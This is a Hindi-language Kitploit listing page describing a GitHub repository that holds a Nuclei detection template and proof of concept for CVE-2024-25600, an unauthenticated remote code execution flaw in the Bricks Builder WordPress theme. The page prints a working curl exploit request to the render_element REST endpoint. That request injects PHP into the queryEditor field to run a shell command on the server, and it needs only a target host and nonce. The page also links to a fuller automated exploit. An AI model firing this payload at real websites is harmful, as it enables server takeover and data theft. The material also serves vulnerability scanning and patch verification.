Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25600_Nuclei-Template — CVE-2024-25600 के लिए Nuclei टेम्पलेट और POC के बारे में जानकारी | Kitploit
उपकरण/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

CVE-2024-25600 के लिए Nuclei टेम्पलेट और POC के बारे में जानकारी

रिपॉजिटरी देखें
31722 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-25600_Nuclei-टेम्पलेट

CVE-2024-25600 के लिए Nuclei टेम्पलेट और POC के बारे में जानकारी

विवरण 📝

वर्डप्रेस के लिए Bricks थीम संस्करण 1.9.6 तक (इसे शामिल करते हुए) सभी संस्करणों में रिमोट कोड निष्पादन की कमजोरी है। यह अप्रमाणित हमलावरों को सर्वर पर कोड निष्पादित करने में सक्षम बनाता है। यह टेम्पलेट 🛠️ nuclei का उपयोग करके वर्डप्रेस के लिए Bricks Builder प्लगइन में पाई गई CVE-2024-25600 कमजोरी 🕳️ का पता लगाने के लिए डिज़ाइन किया गया है। यह कमजोरी प्रभावित वेबसाइटों 💻 पर अप्रमाणित रिमोट कोड निष्पादन की अनुमति देती है।

प्रूफ ऑफ कॉन्सेप्ट (PoC) 📝

पूर्ण POC (स्वचालित) https://github.com/chocapikk/CVE-2024-25600 पर उपलब्ध है।

प्रकटीकरण द्वारा प्रदान किया गया आधार PoC इस प्रकार है:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

को लक्ष्य वेबसाइट से और को साइट से प्राप्त nonce मान से बदलें।

[HOST]
[NONCE]

संदर्भ 📖

CVE-2024-25600 कमजोरी के बारे में अधिक जानकारी के लिए, कृपया Snicco.io पर विस्तृत प्रकटीकरण देखें।

टूल डाउनलोड करें